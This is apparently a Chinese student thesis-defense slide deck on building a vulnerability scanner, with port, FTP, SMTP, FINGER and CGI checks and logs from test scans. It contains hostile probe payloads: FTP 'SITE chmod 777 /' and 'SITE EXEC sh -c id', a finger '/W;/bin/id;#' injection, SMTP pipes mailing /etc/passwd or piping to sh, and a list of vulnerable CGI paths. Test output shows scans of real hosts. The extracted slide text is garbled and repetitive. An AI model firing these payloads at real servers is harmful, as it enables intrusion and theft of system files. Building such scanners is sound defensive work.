畢設(shè)答辯-漏洞掃描工具原理與實現(xiàn)

漏洞掃描工具原理與實現(xiàn)

辯論人：班級：指導教師：課題意義課題意義課題意義漏洞掃描技術(shù)是實現(xiàn)網(wǎng)絡(luò)平安的重要技術(shù)之一檢測網(wǎng)絡(luò)系統(tǒng)潛在的平安漏洞和脆弱性評估網(wǎng)絡(luò)系統(tǒng)的平安狀況開發(fā)環(huán)境開發(fā)平臺Visualstudio2005設(shè)計軟件Visio2003操作系統(tǒng)windowsXP重要技術(shù)winsock編程多線程技術(shù)系統(tǒng)的詳細介紹系統(tǒng)主界面系統(tǒng)流程分析開始輸入掃描目標地址選擇掃描選項目標可否到達N顯示目標不可到達，并退出程序系統(tǒng)流程分析Y端口掃描給出掃描結(jié)果是否掃描FTP漏洞YFTP漏洞掃描給出結(jié)果N系統(tǒng)流程分析是否掃描SMTP漏洞YFTP漏洞掃描給出結(jié)果N是否掃描FINGER漏洞YFINGER漏洞掃描給出結(jié)果N系統(tǒng)流程分析是否掃描CGI漏洞YCGI漏洞掃描給出結(jié)果N掃描結(jié)束系統(tǒng)的模塊劃分系統(tǒng)模塊劃分圖模塊功能簡介總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊檢測目標效勞器是否可到達檢測選擇的掃描選項負責整個程序的運行流程模塊功能簡介總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊檢測是否能與效勞器建立連接檢測效勞器特定端口開放與否給出效勞器開放的端口列表模塊功能簡介總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊檢測目標效勞器是否開放FTP效勞獲取FTP效勞器Banner信息檢測是否存在漏洞給出掃描結(jié)果模塊功能簡介總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊檢測目標效勞器是否開放SMTP效勞獲取目標SMTP效勞器的Banner信息檢測是否存在漏洞給出掃描結(jié)果模塊功能簡介總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊檢測目標效勞器是否開放FINGER效勞檢測是否存在漏洞給出掃描結(jié)果模塊功能簡介總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊總掃描輔助模塊端口掃描模塊FTP漏洞掃描模塊SMTP漏洞掃描模塊FINGER漏洞掃描模塊CGI漏洞掃描模塊檢測目標是否開放WWW效勞獲取目標效勞器的Banner信息檢測是否存在漏洞給出掃描結(jié)果端口掃描模塊端口掃描方法〔1〕TCPconnect()掃描〔2〕TCPSYN掃描〔3〕TCPFIN掃描〔4〕IP段掃描端口掃描模塊端口掃描方法〔1〕TCPconnect()掃描掃描主機嘗試〔使用三次握手〕與目的機指定端口建立正規(guī)的連接。連接由系統(tǒng)調(diào)用connect()開始。對于每一個監(jiān)聽端口，connect()會獲得成功，否那么返回－1，表示端口不可訪問。優(yōu)點：不需要任何權(quán)限

速度缺點：容易被發(fā)現(xiàn)容易被過濾掉端口掃描模塊掃描端口數(shù)組port[60]={7,9,11,13,15,17,19,21,23,25,37,43,53,70,77,79,80,81,87,88,103,104,109,110,111,113,115,119,123,135,137,138,139,143,144,443,512,513,514,515,520,530,540,544,749,750,751,754,1024,1025,1026,1080,1234,1600,2003,2049,6000,6667,8080,0}端口掃描模塊sockfd=socket(AF_INET,SOCK_STREAM,0)

if(sockfd<0)

intr=connect(sockfd,(structsockaddr*)&addr,sizeof(addr));closesocket(sockfd);

if(r!=-1)FTP漏洞掃描模塊FTP漏洞掃描實現(xiàn)FTP效勞器平安問題：〔1〕用戶〔2〕權(quán)限錯誤配置檢測：向效勞器發(fā)出請求，然后接受效勞器返回的信息，如果返回的結(jié)果具備某種特性(如函數(shù)的返回值中包含“150〞“200〞)，我們就可以認為系統(tǒng)中存在漏洞FTP漏洞掃描模塊if(connect(sockfd,(structsockaddr*)&addr,sizeof(addr))<0)recv(sockfd,rbuff,sizeof(rbuff),0);send(sockfd,"USERanonymous\r\n",sizeof("USERanonymous\r\n"),0);send(sockfd,"PASShacker@hacker\r\n",sizeof("PASShacker@hacker\r\n"),0);FTP漏洞掃描模塊send(sockfd,"PASShacker@hacker\r\n",sizeof("PASShacker@hacker\r\n"),0);send(sockfd,"LIST\r\n",sizeof("LIST\r\n"),0);send(sockfd,"SITEchmod777/\r\n",sizeof("SITEchmod777/\r\n"),0)send(sockfd,"MKD

ftpbug\r\n",sizeof("MKDftpbug\r\n"),0);FTP漏洞掃描模塊send(sockfd,"MKD

ftpbug\r\n",sizeof("MKDftpbug\r\n"),0);send(sockfd,"SITEEXECsh-cid\r\n",sizeof("SITEEXECsh-cid\r\n"),0);SMTP漏洞掃描模塊SMTP漏洞掃描的實現(xiàn)方法〔1〕簡單密碼探測〔2〕模擬攻擊SMTP漏洞掃描模塊if(strstr(rbuff,"250")!=NULL)FINGER漏洞掃描FINGER漏洞掃描的實現(xiàn)方法利用協(xié)議本身的漏洞，嘗試模擬攻擊FINGER漏洞掃描send(sockfd,"1234\r\n",sizeof("1234\r\n"),0)send(sockfd,"/W;/bin/id;#\r\n",sizeof("/W;/bin/id;#\r\n"),0)send(sockfd,"/bin/id\r\n",sizeof("/bin/id\r\n"),0)send(sockfd,".\r\n",sizeof(".\r\n"),0)CGI漏洞掃描模塊CGI漏洞掃描實現(xiàn)方法利用模擬攻擊來檢測效勞器的錯誤配置CGI漏洞掃描模塊漏洞數(shù)組cginame[0]="/carbo.dll";cginame[1]="/?PageServices";cginame[2]="/cgi-bin/rwwwshell.pl";cginame[3]="/cgi-bin/phf";cginame[4]="/cgi-bin/Count.cgi";cginame[5]="/cgi-bin/test-cgi";cginame[6]="/cgi-bin/nph-test-cgi";……CGI漏洞掃描模塊Thread[j]=AfxBeginThread(getcgi,(LPVOID)&mycgi[j]);CGI漏洞掃描模塊CGI請求線程流程圖功能測試測試對象localhost〔主機〕功能測試測試截圖功能測試目標IP地址為：掃描目標主機開放的端口：25號端口(smtp)開放!80號端口()開放!110號端口(pop3)開放!8080號端口(未知)開放!開始掃描CGI漏洞：WWW效勞器的Banner：HTTP/1.1200OKServer:Apache-Coyote/1.1ETag:W/"Last-Modified:Thu,14May202122:55:43GMTContent-Type:text/htmlContent-Length:5783Date:Sun,17May202115:08:00GMTConnection:close開始CGI漏洞的掃描.發(fā)現(xiàn)/?PageServices漏洞掃描完畢！?。」δ軠y試開始CGI漏洞的掃描...GET/?PageServicesHTTP/1.0

HTTP/1.1200OKServer:Apache-Coyote/1.1ETagLast-Modified:Thu,14May202122:55:43GMTContent-Type:text/htmlContent-Length:5783Date:Sun,17May202115:44:41GMTConnection:close<html><head><meta-equiv="Content-Type"content="text/html;charset=utf-8"><title>瑗垮畨浜ら€氬ぇ瀛?/title>……<scriptlanguage="JavaScript"src="common/dhtml.js"type="text/JavaScript"></script><![endif]--><scripttype="text/JavaScript"><!--rnd.today=newDate();rnd.sep?Hˊ發(fā)現(xiàn)/?PageServices漏洞功能測試目標IP地址為：掃描目標主機開放的端口：25號端口(smtp)開放!80號端口()開放!21號端口(ftp)開放!110號端口(pop3)開放!111號端口(sunrpc)開放!443號端口(s)開放!開始掃描FTP漏洞：FTP效勞器的Banner：220(vsFTPd2.0.1)測試匿名用戶530PleaseloginwithUSERandPASS.根目錄列表：530PleaseloginwithUSERandPASS.嘗試改變主目錄屬性為可寫：530PleaseloginwithUSERandPASS.嘗試建立目錄：530PleaseloginwithUSERandPASS.嘗試執(zhí)行Shell：530PleaseloginwithUSERandPASS.開始掃描FINGER漏洞：目標沒有開放FINGER效勞...掃描完畢！！！功能測試目標IP地址為：掃描目標主機開放的端口：25號端口(smtp)開放!80號端口()開放!21號端口(ftp)開放!110號端口(pop3)開放!443號端口(s)開放!開始掃描SMTP漏洞：SMTP效勞器的Banner：214PleaseaskpostmasterforhelporEmailtopostmaster.451timeout(#4.5.1)220Welcomtoxjtumailserver(EQManagerV3.1)ESMTP檢查decode別名：檢查漏洞檢查debug漏洞檢查kill漏洞檢查wiz漏洞檢查rcptto:/tmp/.rhosts漏洞檢查++漏洞檢查RSET漏洞檢查mailfrom:|/bin/mailhacker</etc/passwd漏洞檢查RSET漏洞檢查mailfrom:|tail|sh漏洞開始掃描FINGER漏洞：目標沒有開放FINGER效勞...掃描完畢?。?！功能測試localhost掃描結(jié)果：掃描目標：localhost掃描選項：FTP漏洞SMTP漏洞FINGER漏洞CGI漏洞開始掃描目標IP地址為：掃描目標主機開放的端口：21號端口(ftp)開放!25號端口(smtp)開放!80號端口()開放!110號端口(pop3)開放!135號端口(epmap)開放!開始掃描FTP漏洞：FTP效勞器的Banner：測試匿名用戶311Pleasespecifythepassword.根目錄列表：150Herecomesthedirectorylisting.226DirectorysendOK.嘗試改變主目錄屬性為可寫：200SITECHMODcommandok..嘗試建立目錄：257“/var/www/html/test/ftpbug〞created.嘗試執(zhí)行Shell：550Permissiondenied.功能測試localhost開始掃描SMTP漏洞：SMTP效勞器的Banner：可以使用RCPT命令獲得用戶名列表.可以使用EXPN命令獲得用戶名列表.嘗試利用RCPT